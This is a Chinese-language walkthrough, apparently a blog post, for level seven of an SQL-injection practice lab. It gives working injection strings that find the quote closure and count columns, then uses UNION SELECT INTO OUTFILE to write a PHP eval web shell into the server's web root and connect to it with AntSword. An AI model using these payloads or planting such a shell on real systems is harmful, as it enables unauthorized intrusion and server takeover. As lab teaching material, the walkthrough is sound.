SQL靶场第七关攻略

一.判断闭合点

闭合点为?id=1'))--+

二.判断列数

输入?id=1')) order by 3--+页面正常

输入?id=1')) order by 4--+页面异常,说明有3列

这里显示让我们用outfile来打这关,那我们先了解一下outfile:

用法:select 列名 from table [where语句] into outfile '目标文件'

三.写入木马文件

输入?id=-1')) union select 1,2,3 into outfile "D:/phpstudy/phpstudy_pro/WWW/1.txt"--+测试一下是否能把文件写进去

在这里发现写进来以后,就可以写我们的木马文件

输入?id=-1')) union select 1,2,'<?php eval($_post['cmd'])?>' into outfile "D:/phpstudy/phpstudy_pro/WWW/1.php"--+

这样就把我们的木马文件写进来了,我们打开蚁剑连接

连上蚁剑就获得了他的数据库的管理权限了,以上就是第七关的通关攻略

相关推荐
枫叶丹43 分钟前
金仓数据库替代MongoDB:电子证照系统国产化改造实战
数据库·mongodb
麦兜*4 分钟前
Redis 7.0 新特性深度解读:迈向生产级的新纪元
java·数据库·spring boot·redis·spring·spring cloud·缓存
可涵不会debug1 小时前
金仓数据库:破解电子证照国产化难题,开启政务效能新篇
数据库·政务
元闰子1 小时前
对 Agent-First 数据库的畅想
数据库·后端·aigc
java水泥工1 小时前
学科竞赛管理系统|基于SpringBoot和Vue的学科竞赛管理系统(源码+数据库+文档)
数据库·vue.js·spring boot
kobe_OKOK_1 小时前
django 数据库迁移
数据库·oracle·django
落日漫游2 小时前
InnoDB:MySQL高性能事务引擎详解
运维·sql
寻星探路2 小时前
数据库造神计划第二十一天---JDBC编程
数据库·oracle
yuyue_9993 小时前
理解 mvcc
mysql
A-刘晨阳3 小时前
从MongoDB到金仓:一次电子证照系统的平滑国产化升级实践
数据库·mongodb